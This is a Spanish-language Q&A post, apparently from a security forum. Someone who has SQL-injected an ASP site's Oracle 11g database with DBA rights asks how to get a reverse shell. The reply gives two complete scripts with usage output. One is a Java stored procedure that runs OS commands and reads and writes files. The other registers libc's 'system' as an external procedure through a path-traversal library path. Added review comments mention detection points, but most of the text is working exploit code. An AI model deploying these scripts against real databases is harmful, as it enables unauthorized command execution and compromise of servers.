Shell inversa mediante inyección SQL en Oracle [cerrado]


Estoy probando la inyección SQL en un sitio web que usa código ASP. Consigo enumerar con éxito todas las bases de datos y tablas. El usuario actual tiene privilegios de DBA. Me pregunto cómo puedo obtener una shell inversa utilizando esta inyección SQL. La versión de Oracle es "Oracle Database 11g Enterprise Edition Release 11.1.0.7.0".

    
pregunta user1968957 02.08.2015 - 17:50

1 respuesta


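Puede probar estas dos formas de ejecutar código en el DBMS de Oracle. Ambas dependen de que la cuenta de base de datos tenga privilegios elevados (como el rol DBA que menciona la pregunta) para crear los objetos; una cuenta de aplicación con privilegios mínimos no debería poder crearlos.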

La primera es con código Java: enlace

-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r--   1 oracle   system        45 Nov 22 12:20 mytest
-- -rw-r--r--   1 oracle   system      1645 Nov 22 12:20 aaa
-- -rw-r--r--   1 oracle   system      8267 Nov 22 12:20 bbb
-- [...]
--

-- Loads and compiles a Java source object named "oraexec" in the database.
-- The class exposes three static methods: run an OS command, print a file
-- line by line, and append a line to a file. The call specs that follow in
-- this script publish them as PL/SQL procedures.
-- NOTE(review): the usage example in this file shows the resulting files
-- owned by the "oracle" OS account, so the effect is not confined to the
-- database. Oracle's JVM is expected to gate process execution and file I/O
-- behind Java permissions (listed in DBA_JAVA_POLICY) -- confirm which grants
-- the account holds. Unexpected JAVA SOURCE objects in DBA_OBJECTS are worth
-- alerting on.
create or replace and resolve java source named "oraexec" as
import java.lang.*;
import java.io.*;
public class oraexec
{
    /*
     * Command execution module.
     * Hands the string to Runtime.exec and returns immediately: the Process
     * handle is discarded, so the command's output and exit status are never
     * read and the caller gets no indication of success beyond the absence
     * of an IOException.
     */
    public static void execCommand(String command) throws IOException
    {
        Runtime.getRuntime().exec(command);
    }

    /*
     * File reading module.
     * Prints every line of the named file to System.out (the usage example
     * enables dbms_java.set_output and serveroutput to see it in the session).
     * The reader is closed only on the success path, there is no finally
     * block, so an IOException during readLine leaves it open.
     */
    public static void readFile(String filename) throws IOException
    {
        FileReader f = new FileReader(filename);
        BufferedReader fr = new BufferedReader(f);
        String text = fr.readLine();
        while (text != null) {
            System.out.println(text);
            text = fr.readLine();
        }
        fr.close();
    }

    /*
     * File writing module.
     * Opens the named file in append mode and writes the given line followed
     * by a newline. As in readFile, close() is reached only when no write
     * throws.
     */
    public static void writeFile(String filename, String line) throws IOException
    {
        FileWriter f = new FileWriter(filename, true); /* append */
        BufferedWriter fw = new BufferedWriter(f);
        fw.write(line);
        fw.write("\n");
        fw.close();
    }
}
/

-- usage: exec javacmd('command');
-- Call spec: publishes the Java method oraexec.execCommand(String) as the
-- PL/SQL procedure javacmd, passing p_command through unchanged.
-- NOTE(review): a stored procedure whose body is "language java" and that
-- maps to a process-execution method is a strong indicator in an object
-- inventory -- presumably execute rights on it should never reach
-- application accounts, verify grants.
create or replace procedure javacmd(p_command varchar2) as
language java           
name 'oraexec.execCommand(java.lang.String)';
/

-- usage: exec dbms_java.set_output(2000);
--        set serveroutput on;
--        exec javareadfile('/path/to/file');
-- Call spec: publishes the Java method oraexec.readFile(String) as the
-- PL/SQL procedure javareadfile. p_filename is handed to the Java side
-- as-is, no path restriction is applied in this script.
-- NOTE(review): which files are readable depends on the Java file
-- permissions granted to the owning schema -- confirm against
-- DBA_JAVA_POLICY.
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';
/

-- usage: exec javawritefile('/path/to/file', 'line to append');
-- Call spec: publishes the Java method oraexec.writeFile(String, String) as
-- the PL/SQL procedure javawritefile. Both arguments are handed to the Java
-- side as-is, the target file is opened in append mode by that method.
-- NOTE(review): write access is presumably limited only by the Java file
-- permissions of the owning schema and the OS rights of the database
-- account -- confirm both when assessing exposure.
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';
/

La segunda es usar ExtProc: enlace

-- Usage example:
-- $ echo $ORACLE_HOME
-- /opt/oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r--   1 oracle   orainst        0 Dec 19 13:49 /tmp/64
--

-- library for 32-bit oracle releases
-- Registers the library alias exec_shell32. The path starts under
-- $ORACLE_HOME/bin and then climbs out with ../ segments to reach
-- lib/32/libc.so.1 at the filesystem root (the ORA-06522 text in this file's
-- usage example shows the resolved form).
-- NOTE(review): the traversal looks like a way around a check that external
-- libraries live under $ORACLE_HOME/bin -- the usage example targets 9.2.0.1,
-- so verify how the release under review validates library paths (for
-- example the EXTPROC_DLLS setting). CREATE LIBRARY is the privilege involved,
-- and DBA_LIBRARIES lists what has been registered.
create or replace library exec_shell32 as
'$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1';
/

-- library for 64-bit oracle releases
-- Registers the library alias exec_shell64, the 64-bit counterpart: the path
-- starts under $ORACLE_HOME/bin and uses ../ segments to reach
-- lib/64/libc.so.1 at the filesystem root.
-- NOTE(review): a library entry in DBA_LIBRARIES whose file spec contains
-- ../ or points at a system C library is presumably never legitimate --
-- treat it as an indicator and confirm who holds CREATE LIBRARY.
create or replace library exec_shell64 as
'$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1';
/

-- package for 32-bit oracle releases
-- usage: exec oracmd32.exec('command');
-- Package spec: declares one procedure, exec, that takes the command string.
create or replace package oracmd32 as
    procedure exec(cmdstring in char);
end oracmd32;
/
-- Package body: implements exec as an external C procedure bound to the
-- symbol "system" in the library alias exec_shell32, so cmdstring is passed
-- to that symbol rather than to any PL/SQL code.
-- NOTE(review): the ORA-06522 text in this file's usage example mentions
-- extprocPLSExtProc, so the call appears to run in the external procedure
-- agent. Which OS account that agent uses depends on listener
-- configuration -- confirm, and consider disabling extproc where it is not
-- needed.
create or replace package body oracmd32 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_shell32
    language c;
end oracmd32;
/

-- package for 64-bit oracle releases
-- usage: exec oracmd64.exec('command');
-- Package spec: declares one procedure, exec, that takes the command string.
create or replace package oracmd64 as
    procedure exec(cmdstring in char);
end oracmd64;
/
-- Package body: implements exec as an external C procedure bound to the
-- symbol "system" in the library alias exec_shell64. The usage example in
-- this file shows this 64-bit variant succeeding where the 32-bit one failed
-- with an ELF class mismatch.
-- NOTE(review): a package body whose only member is "is external ... name
-- system" is a recognisable pattern when reviewing stored code -- presumably
-- worth a detection rule alongside auditing of CREATE LIBRARY.
create or replace package body oracmd64 as
    procedure exec(cmdstring in char)
    is external
    name "system"
    library exec_shell64
    language c;
end oracmd64;
/
    
respondido por Cristian Dobre 02.08.2015 - 19:27
